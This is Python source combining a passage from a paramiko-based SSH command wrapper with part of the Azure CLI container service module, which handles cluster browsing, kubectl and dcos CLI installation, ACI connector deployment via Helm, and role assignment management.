TimeoutError raised by wait() escapes the with-statement, __exit__ will abort
the command.
"""
def __init__(self, stdin: ChannelStdinFile, stdout: ChannelFile, stderr: ChannelStderrFile):
self.stdin = stdin
self._stdout = stdout
self._stderr = stderr
self._stdout_buff_lock = threading.Lock()
self._stdout_buff = ""
self._stderr_buff_lock = threading.Lock()
self._stderr_buff = ""
self._stdout_consumer_ready = threading.Event()
self._stderr_consumer_ready = threading.Event()
self._stdout_consumer = threading.Thread(target=self._consume_stdout)
self._stderr_consumer = threading.Thread(target=self._consume_stderr)
self._stdout_consumer.start()
self._stderr_consumer.start()
self._stdout_consumer_ready.wait()
self._stderr_consumer_ready.wait()
self._exit_code: Optional[int] = None
self._has_exit = threading.Event()
self._exit_listener = threading.Thread(target=self._wait)
self._exit_listener.start()
def _consume_stdout(self):
try:
self._stdout_consumer_ready.set()
while True:
line = self._stdout.readline()
if not line:
break
with self._stdout_buff_lock:
self._stdout_buff += line
except Exception:  # channel closed or errored; stop consuming
return
def _consume_stderr(self):
try:
self._stderr_consumer_ready.set()
while True:
line = self._stderr.readline()
if not line:
break
with self._stderr_buff_lock:
self._stderr_buff += line
except Exception:  # channel closed or errored; stop consuming
return
def _wait(self):
self._exit_code = self._stdout.channel.recv_exit_status()
self._has_exit.set()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
@property
def exit_code(self) -> Optional[int]:
"""
Returns the exit_code of the command or None if the command is still running.
In case of a failure or an aborted command, -1 will be returned as paramiko does via
recv_exit_status.
:return: Exit code of the command or None if the command is still running.
"""
if not self._has_exit.is_set():
return None
return self._exit_code
def wait(self, timeout: Optional[float] = None) -> int:
"""
Waits for the command to exit. Raises a TimeoutError if the timeout is reached
before the command has exit. The command will not be aborted automatically if this happens.
:param timeout: Timeout in (fractions of) seconds. Infinity if None.
:return: The exit code of the process.
"""
self._has_exit.wait(timeout)
if self.exit_code is None:
raise TimeoutError("waiting for command exit timed out")
return self.exit_code
@property
def stdout(self) -> str:
"""
Returns the asynchronously captured stdout.
:return: The captured stdout.
"""
with self._stdout_buff_lock:
return self._stdout_buff
@property
def stderr(self) -> str:
"""
Returns the asynchronously captured stderr.
:return: The captured stderr.
"""
with self._stderr_buff_lock:
return self._stderr_buff
def close(self):
"""
Closes the command, aborting it if it has not exit yet.
"""
if not self.stdin.closed:
self.stdin.close()
self.stdin.channel.close()
if not self._stdout.closed:
self._stdout.close()
if not self._stderr.closed:
self._stderr.close()
self._stdout_consumer.join()
self._stderr_consumer.join()
self._exit_listener.join()
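# A minimal usage sketch (an assumption, not part of the original module):
# RemoteCommand is built from the three file objects returned by paramiko's
# exec_command. Host name, credentials and the command string below are
# hypothetical placeholders.
def _demo_remote_command():
    import paramiko
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect('example.com', username='user', password='secret')
    stdin, stdout, stderr = client.exec_command('uname -a')
    try:
        with RemoteCommand(stdin, stdout, stderr) as cmd:
            exit_code = cmd.wait(timeout=30)
            print(exit_code, cmd.stdout, cmd.stderr)
    finally:
        client.close()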
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterServicePrincipalProfile
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.v2020_03_01.models import ManagedCluster
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterIdentity
from azure.mgmt.containerservice.v2020_03_01.models import AgentPool
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterSKU
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterWindowsProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterMasterPoolProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftAgentPoolProfileRole
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterIdentityProvider
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterAADIdentityProvider
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedCluster
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftRouterProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterAuthProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import NetworkProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterMonitorProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftAPIProperties
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._helpers import _populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set, a path to an SSH key to use; only applies to DC/OS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError('Unsupported platform: {}'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None):
"""Install kubectl, a command-line interface for Kubernetes clusters."""
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError('Unsupported platform: {}'.format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group):
from subprocess import PIPE, Popen
instance = client.get(resource_group_name, name)
helm_not_installed = 'Helm not detected, please verify if it is installed.'
url_chart = chart_url
if image_tag is None:
image_tag = 'latest'
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# If SPN is specified, the secret should also be specified
if service_principal is not None and client_secret is None:
raise CLIError('--client-secret must be specified when --service-principal is specified')
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
# Validate the location against the available ACI regions
_validate_aci_location(norm_location)
# Get the credentials from an AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
subscription_id = get_subscription_id(cmd.cli_ctx)
# Get the TenantID
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, tenant_id = profile.get_login_credentials()
# Check if we want the linux connector
if os_type.lower() in ['linux', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Linux', instance.enable_rbac, instance.fqdn)
# Check if we want the windows connector
if os_type.lower() in ['windows', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Windows', instance.enable_rbac, instance.fqdn)
def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, os_type, use_rbac, masterFqdn):
rbac_install = "true" if use_rbac else "false"
node_taint = 'azure.com/aci'
helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
k8s_master = 'https://{}'.format(masterFqdn)
logger.warning("Deploying the ACI connector for '%s' using Helm", os_type)
try:
values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format(
node_name, node_taint, os_type, image_tag, rbac_install)
if service_principal:
values += ",env.azureClientId=" + service_principal
if client_secret:
values += ",env.azureClientKey=" + client_secret
if subscription_id:
values += ",env.azureSubscriptionId=" + subscription_id
if tenant_id:
values += ",env.azureTenantId=" + tenant_id
if aci_resource_group:
values += ",env.aciResourceGroup=" + aci_resource_group
if norm_location:
values += ",env.aciRegion=" + norm_location
# Currently, we need to set the master FQDN.
# This is temporary and we should remove it when possible
values += ",env.masterUri=" + k8s_master
if helm_cmd == "install":
subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values])
elif helm_cmd == "upgrade":
subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values])
except subprocess.CalledProcessError as err:
raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err))
def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, graceful=False, os_type='Linux'):
from subprocess import PIPE, Popen
helm_not_installed = "Error : Helm not detected, please verify if it is installed."
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# Get the credentials from an AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
if os_type.lower() in ['linux', 'both']:
helm_release_name = connector_name.lower() + '-linux-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
if os_type.lower() in ['windows', 'both']:
helm_release_name = connector_name.lower() + '-windows-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
def _undeploy_connector(graceful, node_name, helm_release_name):
if graceful:
logger.warning('Graceful option selected, will try to drain the node first')
from subprocess import PIPE, Popen
kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.'
try:
Popen(["kubectl"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(kubectl_not_installed)
try:
drain_node = subprocess.check_output(
['kubectl', 'drain', node_name, '--force', '--delete-local-data'],
universal_newlines=True)
if not drain_node:
raise CLIError('Could not find the node, make sure you' +
' are using the correct --os-type')
except subprocess.CalledProcessError as err:
raise CLIError('Could not find the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
logger.warning("Undeploying the '%s' using Helm", helm_release_name)
try:
subprocess.call(['helm', 'del', helm_release_name, '--purge'])
except subprocess.CalledProcessError as err:
raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err))
try:
subprocess.check_output(
['kubectl', 'delete', 'node', node_name],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not delete the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
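# Note on the retry schedule in _add_role_assignment above (derived from its
# loop, not new behaviour): on each failed attempt it sleeps delay + delay * x
# for x in 0..9, so with the default delay=2 the waits are 2, 4, ..., 20
# seconds, roughly 110 seconds in total before giving up and returning False.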
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
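# Illustrative example (sketch with a made-up subscription id, not part of the original
# source): the prefix is "<=10 name chars>-<=16 resource group chars>-<6 subscription chars>",
# with non-alphanumeric characters stripped:
#     >>> _get_default_dns_prefix('MyCluster!', 'my_rg-01', '8ecadfc9-d1a3-4ea4-b844-0d9f87e4d7c8')
#     'MyCluster-myrg-01-8ecadf'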
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
